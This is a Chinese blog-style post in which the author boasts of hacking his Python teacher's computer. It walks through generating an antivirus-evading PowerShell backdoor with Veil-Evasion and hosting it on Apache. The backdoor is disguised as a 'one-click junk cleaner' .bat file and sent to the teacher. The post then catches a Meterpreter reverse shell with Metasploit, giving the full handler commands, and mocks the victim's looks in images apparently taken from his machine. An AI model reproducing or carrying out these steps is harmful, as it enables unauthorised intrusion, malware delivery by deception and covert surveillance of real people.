metasploit社工黑掉python老师电脑，脸长得可真黑！

image

1、安装veil-evasion生成payload

kalilinux可以直接 apt-get install veil-evasion

这里选择第一种安装方法，一梭子子弹打下去就成这样了如图：

image

不过不要急，cd默认安装路径/usr/share/veil-evasion/下,执行./ Veil-Evasion会提示你安装，默认情况下安装会爆很多错，执行此命令m -rf /root/.config/wine/veil 和 re-run: /usr/share/veil-evasion/setup/setup.sh -c解决

image image

选择list选择一个payload，选择24,我们选择powershell，因为这玩意免杀效果好，生成bat文件命令：use 24 如图：

image

设置一下Lhost lport 即可，根据自己的需要来设置，然后执行 generate然后生成payload，会提示输入一个名称，随便输入一个

image

下面我们启动apache2然后把后门复制到/var/www/html目录下载。。

2、伪装后门利用metasploit弹回shell

命令： use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 1.1.1.1

set lport 7766

set ExitOnSession false

exploit -j

然后我把生成的bat文件修改为一键超速清理系统垃圾.bat发给目标，然后不一会shell谈回来了，

下面是获取到的一些图片：

image

尼玛长的有些像菲律宾人，太对不起观众了哈哈各位就一个简单直白的渗透思路，大家凑合的看吧，让大家见笑了！